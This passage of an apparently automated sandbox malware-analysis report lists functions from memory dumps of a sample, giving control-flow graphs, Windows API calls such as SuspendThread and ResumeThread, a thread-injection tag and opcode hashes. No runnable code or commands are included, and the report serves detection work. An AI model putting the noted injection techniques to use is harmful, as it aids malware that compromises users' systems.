                                            Function 00007FFD9B871A35 Relevance: .4, Instructions: 361COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70396a04a613651b07a340bb360ce8e3c952bb6562cd5af94e28e59459522832
                                            • Instruction ID: 75de8afce0bb0620455b136cbada7d73451a1330c3d6886e05592514ff1f42c8
                                            • Opcode Fuzzy Hash: 70396a04a613651b07a340bb360ce8e3c952bb6562cd5af94e28e59459522832
                                            • Instruction Fuzzy Hash: F4C11671E09A8D8FE755EBA8E8A57E97BE1FF59304F0402BAD04CC76E2DE7824058741
                                            Function 00007FFD9BA2B8D0 Relevance: 1.7, APIs: 1, Instructions: 167threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 5ddab3ffdc05db640aa3f38ae162dfacb22e9499cea0cabfc230049fc9ec51c5
                                            • Instruction ID: f6f861c3d6ee8f7ef31da667c06dc690dea8871855d060086171fba73bcc67db
                                            • Opcode Fuzzy Hash: 5ddab3ffdc05db640aa3f38ae162dfacb22e9499cea0cabfc230049fc9ec51c5
                                            • Instruction Fuzzy Hash: 1C51AA70D0D78C8FDB99DFA8D855AE9BBF0EF16310F0441ABD049DB2A2DA749846CB11
                                            Function 00007FFD9BA2A11D Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 12 7ffd9ba2a11d-7ffd9ba2a129 13 7ffd9ba2a134-7ffd9ba2a202 SuspendThread 12->13 14 7ffd9ba2a12b-7ffd9ba2a133 12->14 18 7ffd9ba2a204 13->18 19 7ffd9ba2a20a-7ffd9ba2a254 13->19 14->13 18->19
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: SuspendThread
                                            • String ID:
                                            • API String ID: 3178671153-0
                                            • Opcode ID: 7c68059b116878e0244c6e1c50ce2622cf73dd913ff17b04a7bab9a6f994f835
                                            • Instruction ID: a4c15b1d437d1f5629405bfb2a1524c98eaf640af21e811494e257f8982b5e9f
                                            • Opcode Fuzzy Hash: 7c68059b116878e0244c6e1c50ce2622cf73dd913ff17b04a7bab9a6f994f835
                                            • Instruction Fuzzy Hash: 60414B70E0864C8FDB58DFA8D895AEDBBF0FF5A310F1041AAD049E7292DA74A845CB41
                                            Function 00007FFD9BA2D675 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 22 7ffd9ba2d675-7ffd9ba2d753 GetFileAttributesW 26 7ffd9ba2d755 22->26 27 7ffd9ba2d75b-7ffd9ba2d799 22->27 26->27
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 1d34b86b4897199723ffe40d98a17b8cb2621f57e912835f3f583b699e0f355c
                                            • Instruction ID: 034cf8f5873650f1130a8af20ea20e9f666c8a581f3594879de40416f7745413
                                            • Opcode Fuzzy Hash: 1d34b86b4897199723ffe40d98a17b8cb2621f57e912835f3f583b699e0f355c
                                            • Instruction Fuzzy Hash: DA411A70E0860C8FDB98DF98D895BEDBBF0FB5A310F10416ED049E7292DA75A885CB41
                                            Function 00007FFD9BF8A8F8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: f70a364ca91b69760adf077a655dd405567e6ab2c83095f77c9f4170641f2728
                                            • Instruction ID: 74c8616ad2bb757ec928552507e949705cfdf78985fbbe2a2dfee920b5dcd984
                                            • Opcode Fuzzy Hash: f70a364ca91b69760adf077a655dd405567e6ab2c83095f77c9f4170641f2728
                                            • Instruction Fuzzy Hash: BF518F31E4994E8FDB69DF98D4A15FCB7B1FF54300F1141BAD01AE72A6DA366A01CB40
                                            Function 00007FFD9BA2BA39 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 97 7ffd9ba2ba39-7ffd9ba2ba45 98 7ffd9ba2ba50-7ffd9ba2bb22 CloseHandle 97->98 99 7ffd9ba2ba47-7ffd9ba2ba4f 97->99 103 7ffd9ba2bb24 98->103 104 7ffd9ba2bb2a-7ffd9ba2bb7e 98->104 99->98 103->104
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 95e5e2b73b821fe4dd3f1d6c2b1dd62fd075afea915abddbadebcb37e1fb9dff
                                            • Instruction ID: 2511dce24587dcc04c7fb8336ce535979f281e9fb74ebde2fad0a6e6954e6c58
                                            • Opcode Fuzzy Hash: 95e5e2b73b821fe4dd3f1d6c2b1dd62fd075afea915abddbadebcb37e1fb9dff
                                            • Instruction Fuzzy Hash: D2416D70D0874C8FDB59DFA8D895BECBBF0EF1A310F1041AAD049D7292DA749985CB41
                                            Function 00007FFD9B87C4B6 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction ID: b86f580b9e4235ae0f65c468915ea83c9d59490da1f154c91c52d97dad46f0a5
                                            • Opcode Fuzzy Hash: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction Fuzzy Hash: 4021BE70A1951E8FEB64EF54C8A87A977B1FB58304F1105F9C40DA3291CB756B84DF50
                                            Function 00007FFD9BF86DB0 Relevance: .7, Instructions: 684COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 130 7ffd9bf86db0-7ffd9bf86dca 131 7ffd9bf86dd0-7ffd9bf86de0 130->131 132 7ffd9bf873cc-7ffd9bf873da 130->132 135 7ffd9bf8742a-7ffd9bf87440 131->135 136 7ffd9bf86de6-7ffd9bf86e21 131->136 133 7ffd9bf873e1-7ffd9bf873f0 132->133 134 7ffd9bf873dc 132->134 134->133 140 7ffd9bf87442-7ffd9bf87466 135->140 141 7ffd9bf8748a-7ffd9bf8749d 135->141 139 7ffd9bf86eba-7ffd9bf86ec2 136->139 142 7ffd9bf86ec8 139->142 143 7ffd9bf86e26-7ffd9bf86e2f 139->143 144 7ffd9bf86ed2-7ffd9bf86eef 142->144 143->135 145 7ffd9bf86e35-7ffd9bf86e40 143->145 148 7ffd9bf86ef6-7ffd9bf86f07 144->148 146 7ffd9bf86eca-7ffd9bf86ece 145->146 147 7ffd9bf86e46-7ffd9bf86e5a 145->147 146->144 149 7ffd9bf86eb3-7ffd9bf86eb7 147->149 150 7ffd9bf86e5c-7ffd9bf86e73 147->150 155 7ffd9bf86f20-7ffd9bf86f2f 148->155 156 7ffd9bf86f09-7ffd9bf86f1e 148->156 149->139 150->135 151 7ffd9bf86e79-7ffd9bf86e85 150->151 153 7ffd9bf86e9f-7ffd9bf86eb0 151->153 154 7ffd9bf86e87-7ffd9bf86e9b 151->154 153->149 154->150 157 7ffd9bf86e9d 154->157 160 7ffd9bf86f51-7ffd9bf86fbe 155->160 161 7ffd9bf86f31-7ffd9bf86f4c 155->161 156->155 157->149 170 7ffd9bf86fc0-7ffd9bf86fd3 160->170 171 7ffd9bf8700f-7ffd9bf87056 160->171 168 7ffd9bf87389-7ffd9bf873a9 161->168 175 7ffd9bf873ad-7ffd9bf873ba 168->175 170->135 174 7ffd9bf86fd9-7ffd9bf87007 170->174 181 7ffd9bf8705a-7ffd9bf8707b 171->181 182 7ffd9bf87008-7ffd9bf8700d 174->182 177 7ffd9bf873bc-7ffd9bf873c6 175->177 177->131 179 7ffd9bf873cb 177->179 179->132 185 7ffd9bf8707d-7ffd9bf87081 181->185 186 7ffd9bf870ec-7ffd9bf870fd 181->186 182->170 183 7ffd9bf8700e 182->183 183->171 185->182 189 7ffd9bf87083 185->189 187 7ffd9bf870fe-7ffd9bf87101 186->187 191 7ffd9bf87107-7ffd9bf8710b 187->191 190 7ffd9bf870ac-7ffd9bf870bd 189->190 190->191 196 7ffd9bf870bf-7ffd9bf870cd 190->196 192 7ffd9bf8710d-7ffd9bf8710f 191->192 194 7ffd9bf87111-7ffd9bf8711f 192->194 195 7ffd9bf87159-7ffd9bf87161 192->195 199 7ffd9bf87121-7ffd9bf87125 194->199 200 7ffd9bf87190-7ffd9bf871a5 194->200 197 7ffd9bf87163-7ffd9bf8716c 195->197 198 7ffd9bf871ab-7ffd9bf871b3 195->198 201 7ffd9bf870cf-7ffd9bf870d3 196->201 202 7ffd9bf8713e-7ffd9bf87153 196->202 203 7ffd9bf8716f-7ffd9bf87171 197->203 205 7ffd9bf8723b-7ffd9bf87249 198->205 206 7ffd9bf871b9-7ffd9bf871d2 198->206 199->190 213 7ffd9bf87127 199->213 200->198 201->181 218 7ffd9bf870d5 201->218 202->195 211 7ffd9bf87173-7ffd9bf87175 203->211 212 7ffd9bf871e2-7ffd9bf871e4 203->212 207 7ffd9bf8724b-7ffd9bf8724d 205->207 208 7ffd9bf872ba-7ffd9bf872bb 205->208 206->205 209 7ffd9bf871d4-7ffd9bf871d5 206->209 214 7ffd9bf8724f 207->214 215 7ffd9bf872c9-7ffd9bf872cb 207->215 221 7ffd9bf872eb-7ffd9bf872ed 208->221 216 7ffd9bf871d6-7ffd9bf871e0 209->216 219 7ffd9bf871f1-7ffd9bf871f5 211->219 220 7ffd9bf87177 211->220 225 7ffd9bf871e5-7ffd9bf871e7 212->225 213->202 214->216 224 7ffd9bf87251 214->224 222 7ffd9bf872cd-7ffd9bf872cf 215->222 223 7ffd9bf8733c 215->223 216->212 218->186 227 7ffd9bf87271-7ffd9bf8728b 219->227 228 7ffd9bf871f7 219->228 220->187 226 7ffd9bf87179 220->226 229 7ffd9bf872ef 221->229 230 7ffd9bf8735e-7ffd9bf87387 221->230 232 7ffd9bf872d1 222->232 233 7ffd9bf8734b-7ffd9bf8734f 222->233 223->175 231 7ffd9bf8733e-7ffd9bf87340 223->231 234 7ffd9bf87258-7ffd9bf8725c 224->234 244 7ffd9bf87268-7ffd9bf87270 225->244 245 7ffd9bf871e8 225->245 236 7ffd9bf8717e-7ffd9bf87184 226->236 257 7ffd9bf872bd-7ffd9bf872c6 227->257 258 7ffd9bf8728d-7ffd9bf8729b 227->258 228->236 237 7ffd9bf871f9 228->237 238 7ffd9bf8730c-7ffd9bf8731a 229->238 230->168 231->177 239 7ffd9bf87342 231->239 232->234 240 7ffd9bf872d3 232->240 233->179 241 7ffd9bf87351 233->241 242 7ffd9bf8725e 234->242 243 7ffd9bf872d8-7ffd9bf872de 234->243 249 7ffd9bf87200-7ffd9bf87225 236->249 256 7ffd9bf87186 236->256 237->249 250 7ffd9bf8731b-7ffd9bf87325 238->250 239->215 251 7ffd9bf87344 239->251 240->243 241->243 252 7ffd9bf87353 241->252 242->225 253 7ffd9bf87260 242->253 260 7ffd9bf8735a-7ffd9bf8735d 243->260 261 7ffd9bf872e0 243->261 244->227 245->203 255 7ffd9bf871e9-7ffd9bf871ea 245->255 268 7ffd9bf87228-7ffd9bf87239 249->268 259 7ffd9bf87327-7ffd9bf8733a 250->259 251->233 252->260 253->244 255->219 256->192 262 7ffd9bf87188 256->262 257->215 258->238 263 7ffd9bf8729d-7ffd9bf8729f 258->263 259->223 260->230 261->259 266 7ffd9bf872e2-7ffd9bf872ea 261->266 262->200 263->250 267 7ffd9bf872a1 263->267 266->221 267->268 270 7ffd9bf872a3 267->270 268->205 268->209 270->208
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d628610fc0141a935628daf49b3f481f0f49084cdff05fe24366ac0d5c6eae88
                                            • Instruction ID: 4fa6b586884eac02f19b6428c8a19dad380c6345ce2ed2941989af53a59d04ee
                                            • Opcode Fuzzy Hash: d628610fc0141a935628daf49b3f481f0f49084cdff05fe24366ac0d5c6eae88
                                            • Instruction Fuzzy Hash: 0822A730B19E1D8FDBA8DF48C8A5A7877E2FF54314B1102B9D40EC76A2DA35AD45CB81
                                            Function 00007FFD9BF8AB6F Relevance: .4, Instructions: 369COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 271 7ffd9bf8ab6f-7ffd9bf8ab82 272 7ffd9bf8abce-7ffd9bf8abe4 271->272 273 7ffd9bf8ab84-7ffd9bf8aec5 271->273 275 7ffd9bf8abea-7ffd9bf8abf2 272->275 276 7ffd9bf8ac74-7ffd9bf8acad 272->276 279 7ffd9bf8aecf-7ffd9bf8af0e 273->279 278 7ffd9bf8abf8-7ffd9bf8ac0a 275->278 275->279 285 7ffd9bf8acae-7ffd9bf8acc4 276->285 278->279 280 7ffd9bf8ac10-7ffd9bf8ac27 278->280 286 7ffd9bf8af10 279->286 283 7ffd9bf8ac67-7ffd9bf8ac6e 280->283 284 7ffd9bf8ac29-7ffd9bf8ac30 280->284 283->275 283->276 284->279 287 7ffd9bf8ac36-7ffd9bf8ac64 284->287 285->279 288 7ffd9bf8acca-7ffd9bf8acee 285->288 289 7ffd9bf8af1b-7ffd9bf8afb1 286->289 287->283 290 7ffd9bf8acf0-7ffd9bf8ad13 call 7ffd9bf83818 288->290 291 7ffd9bf8ad41-7ffd9bf8ad48 288->291 299 7ffd9bf8af36-7ffd9bf8afb6 289->299 300 7ffd9bf8afbc-7ffd9bf8afff 289->300 290->279 301 7ffd9bf8ad19-7ffd9bf8ad3f 290->301 291->285 294 7ffd9bf8ad4e-7ffd9bf8ad57 291->294 297 7ffd9bf8ad5d-7ffd9bf8ad63 294->297 298 7ffd9bf8ae8f-7ffd9bf8ae9d 294->298 297->279 302 7ffd9bf8ad69-7ffd9bf8ad78 297->302 303 7ffd9bf8ae9f 298->303 304 7ffd9bf8aea4-7ffd9bf8aeb5 298->304 299->300 313 7ffd9bf8af58-7ffd9bf8afb8 299->313 311 7ffd9bf8b001-7ffd9bf8b107 300->311 301->290 301->291 306 7ffd9bf8ad7e-7ffd9bf8ad85 302->306 307 7ffd9bf8ae82-7ffd9bf8ae89 302->307 303->304 306->279 309 7ffd9bf8ad8b-7ffd9bf8ad97 call 7ffd9bf83818 306->309 307->297 307->298 315 7ffd9bf8ad9c-7ffd9bf8ada7 309->315 345 7ffd9bf8b237-7ffd9bf8b254 311->345 346 7ffd9bf8b1ec-7ffd9bf8b1fb 311->346 313->300 323 7ffd9bf8af7c-7ffd9bf8afba 313->323 317 7ffd9bf8ade6-7ffd9bf8adf5 315->317 318 7ffd9bf8ada9-7ffd9bf8adc0 315->318 317->279 322 7ffd9bf8adfb-7ffd9bf8ae1f 317->322 318->279 321 7ffd9bf8adc6-7ffd9bf8ade2 318->321 321->318 325 7ffd9bf8ade4 321->325 326 7ffd9bf8ae22-7ffd9bf8ae3f 322->326 323->300 332 7ffd9bf8af9d-7ffd9bf8afb0 323->332 329 7ffd9bf8ae62-7ffd9bf8ae78 325->329 326->279 330 7ffd9bf8ae45-7ffd9bf8ae60 326->330 329->279 333 7ffd9bf8ae7a-7ffd9bf8ae7e 329->333 330->326 330->329 333->307 348 7ffd9bf8b25a-7ffd9bf8b269 345->348 349 7ffd9bf8b561-7ffd9bf8b5c8 345->349 347 7ffd9bf8b548-7ffd9bf8b559 346->347 347->349 348->346 350 7ffd9bf8b26b-7ffd9bf8b26f 348->350 353 7ffd9bf8b738 349->353 350->311 352 7ffd9bf8b275 350->352 354 7ffd9bf8b2f3-7ffd9bf8b300 352->354 353->353 354->347 355 7ffd9bf8b277-7ffd9bf8b292 call 7ffd9bf8af00 354->355 355->354
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7bc41e9954bc4ada9e5f64acce389f590df4168c8ac311d361200a9f343cfc49
                                            • Instruction ID: 30d89953aed6ae13a81644a4f7cc48b0b30638caa026f07ce26e166dc19e4ffc
                                            • Opcode Fuzzy Hash: 7bc41e9954bc4ada9e5f64acce389f590df4168c8ac311d361200a9f343cfc49
                                            • Instruction Fuzzy Hash: FDD10470659A4A8FEB59CF58C0E05B037A1FF45300B5546BDD84BCB69BDA39F982CB80
                                            Function 00007FFD9BF8AB8F Relevance: .3, Instructions: 336COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 412 7ffd9bf8ab8f-7ffd9bf8ab98 413 7ffd9bf8ab9e-7ffd9bf8abaf 412->413 414 7ffd9bf8aecf-7ffd9bf8af10 412->414 415 7ffd9bf8abc5-7ffd9bf8abcc 413->415 416 7ffd9bf8abb1-7ffd9bf8abb5 413->416 427 7ffd9bf8af1b-7ffd9bf8afb1 414->427 419 7ffd9bf8abce-7ffd9bf8abe4 415->419 420 7ffd9bf8ab84-7ffd9bf8aec5 415->420 416->414 418 7ffd9bf8abbb-7ffd9bf8abc3 416->418 418->415 423 7ffd9bf8abea-7ffd9bf8abf2 419->423 424 7ffd9bf8ac74-7ffd9bf8acad 419->424 420->414 423->414 426 7ffd9bf8abf8-7ffd9bf8ac0a 423->426 433 7ffd9bf8acae-7ffd9bf8acc4 424->433 426->414 428 7ffd9bf8ac10-7ffd9bf8ac27 426->428 436 7ffd9bf8af36-7ffd9bf8afb6 427->436 437 7ffd9bf8afbc-7ffd9bf8afff 427->437 431 7ffd9bf8ac67-7ffd9bf8ac6e 428->431 432 7ffd9bf8ac29-7ffd9bf8ac30 428->432 431->423 431->424 432->414 435 7ffd9bf8ac36-7ffd9bf8ac64 432->435 433->414 438 7ffd9bf8acca-7ffd9bf8acee 433->438 435->431 436->437 447 7ffd9bf8af58-7ffd9bf8afb8 436->447 446 7ffd9bf8b001-7ffd9bf8b107 437->446 440 7ffd9bf8acf0-7ffd9bf8ad13 call 7ffd9bf83818 438->440 441 7ffd9bf8ad41-7ffd9bf8ad48 438->441 440->414 453 7ffd9bf8ad19-7ffd9bf8ad3f 440->453 441->433 444 7ffd9bf8ad4e-7ffd9bf8ad57 441->444 449 7ffd9bf8ad5d-7ffd9bf8ad63 444->449 450 7ffd9bf8ae8f-7ffd9bf8ae9d 444->450 490 7ffd9bf8b237-7ffd9bf8b254 446->490 491 7ffd9bf8b1ec-7ffd9bf8b1fb 446->491 447->437 462 7ffd9bf8af7c-7ffd9bf8afba 447->462 449->414 454 7ffd9bf8ad69-7ffd9bf8ad78 449->454 455 7ffd9bf8ae9f 450->455 456 7ffd9bf8aea4-7ffd9bf8aeb5 450->456 453->440 453->441 458 7ffd9bf8ad7e-7ffd9bf8ad85 454->458 459 7ffd9bf8ae82-7ffd9bf8ae89 454->459 455->456 458->414 460 7ffd9bf8ad8b-7ffd9bf8ad97 call 7ffd9bf83818 458->460 459->449 459->450 467 7ffd9bf8ad9c-7ffd9bf8ada7 460->467 462->437 471 7ffd9bf8af9d-7ffd9bf8afb0 462->471 468 7ffd9bf8ade6-7ffd9bf8adf5 467->468 469 7ffd9bf8ada9-7ffd9bf8adc0 467->469 468->414 473 7ffd9bf8adfb-7ffd9bf8ae1f 468->473 469->414 472 7ffd9bf8adc6-7ffd9bf8ade2 469->472 472->469 475 7ffd9bf8ade4 472->475 476 7ffd9bf8ae22-7ffd9bf8ae3f 473->476 477 7ffd9bf8ae62-7ffd9bf8ae78 475->477 476->414 478 7ffd9bf8ae45-7ffd9bf8ae60 476->478 477->414 480 7ffd9bf8ae7a-7ffd9bf8ae7e 477->480 478->476 478->477 480->459 493 7ffd9bf8b25a-7ffd9bf8b269 490->493 494 7ffd9bf8b561-7ffd9bf8b5c8 490->494 492 7ffd9bf8b548-7ffd9bf8b559 491->492 492->494 493->491 495 7ffd9bf8b26b-7ffd9bf8b26f 493->495 498 7ffd9bf8b738 494->498 495->446 497 7ffd9bf8b275 495->497 499 7ffd9bf8b2f3-7ffd9bf8b300 497->499 498->498 499->492 500 7ffd9bf8b277-7ffd9bf8b292 call 7ffd9bf8af00 499->500 500->499
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12424a31a763553ca37815034972ad4ce6359870df4d5b8bb2c722549bd96dbe
                                            • Instruction ID: be45863192c8ed71d01e16ba6f8ca0bdfcb3b216a6f9acff574652926f4638ef
                                            • Opcode Fuzzy Hash: 12424a31a763553ca37815034972ad4ce6359870df4d5b8bb2c722549bd96dbe
                                            • Instruction Fuzzy Hash: E0C1147065AA4A8FEB1DCF58C0E05B137A1FF45300B5546BDD88B8B59BDA39F942CB80
                                            Function 00007FFD9BF87BD7 Relevance: .3, Instructions: 327COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 502 7ffd9bf87bd7-7ffd9bf87bee 504 7ffd9bf87bf3-7ffd9bf87dfb 502->504 505 7ffd9bf87bf0 502->505 511 7ffd9bf87e06-7ffd9bf87e98 504->511 505->504 526 7ffd9bf87e40-7ffd9bf87e69 511->526 527 7ffd9bf87e6a-7ffd9bf87e79 call 7ffd9bf87e9a 511->527 526->527
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb1d63ed238e0ddb55b31f790cbc2fe573465391510f47b28c7501eb38ca38cd
                                            • Instruction ID: dea2d085e26a430f0a6bb551db9314f87510bba974320b44cdf1806e9f7404c5
                                            • Opcode Fuzzy Hash: fb1d63ed238e0ddb55b31f790cbc2fe573465391510f47b28c7501eb38ca38cd
                                            • Instruction Fuzzy Hash: 0131C331F5EE5E8AE7B9EF9498A16B877A0EF14304F15027AD00EC31E2DD3A6D409742
                                            Function 00007FFD9BF885A0 Relevance: .3, Instructions: 297COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a32843185a46992f0e259765f29ab3c2e7a02b4a14c699eeeab1a06238d5b27f
                                            • Instruction ID: 086b10b02bf3d4f963c9aa8f856d8217e65704338585a63a44e5149f2f4384e1
                                            • Opcode Fuzzy Hash: a32843185a46992f0e259765f29ab3c2e7a02b4a14c699eeeab1a06238d5b27f
                                            • Instruction Fuzzy Hash: A0A1D131A4DA8E8FDBA5DFA8C8646B877E1EF55300F4502BAD04EC71A2DE39AD05C741
                                            Function 00007FFD9B870A19 Relevance: .3, Instructions: 283COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 677aaa5ef09fcc1390741f504a7b077a8204e90f750be44a771b7d4a816db15b
                                            • Instruction ID: c47ca0b4473eaa7060cb68b02bcf83a69647e265c034373853b041987bc720b7
                                            • Opcode Fuzzy Hash: 677aaa5ef09fcc1390741f504a7b077a8204e90f750be44a771b7d4a816db15b
                                            • Instruction Fuzzy Hash: FA712711B2EB4D0AFB6856BC08A52B976C2DF89719F26027DD4DFC32E7DC1C69075241
                                            Function 00007FFD9BF8D5D4 Relevance: .3, Instructions: 274COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 887218ba19ca201523a2731c47a36521ad8843ca981ec3e91116ee9653b1c8df
                                            • Instruction ID: 74fa4a30bf46347cd1c8fcb24954cf3680c865eb1a05e455ffe7de31c8aebb36
                                            • Opcode Fuzzy Hash: 887218ba19ca201523a2731c47a36521ad8843ca981ec3e91116ee9653b1c8df
                                            • Instruction Fuzzy Hash: F711C81AF8FD8B8BF7355DE8283507C59405F11610F1A03BFC45F468E6DD2E2A455392
                                            Function 00007FFD9B871AFD Relevance: .3, Instructions: 273COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41987b13846ad0d7729a2a13583488b2b537aa0cd245f4cec51ac8400078cbd1
                                            • Instruction ID: 4489b0bb2831730262c40d62beb1fa1606766088d8e2a112a15ffa3f0c6383df
                                            • Opcode Fuzzy Hash: 41987b13846ad0d7729a2a13583488b2b537aa0cd245f4cec51ac8400078cbd1
                                            • Instruction Fuzzy Hash: D4A1B271E08A8D8FE798EBA8E8A57E87BE1FF58304F5001BED10DD76A6DB7814058741
                                            Function 00007FFD9BF89966 Relevance: .3, Instructions: 255COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42e4b5955bfd2c49314a8f245b6f9dbdceddf38033c7e8f73c4f4834d601d3ef
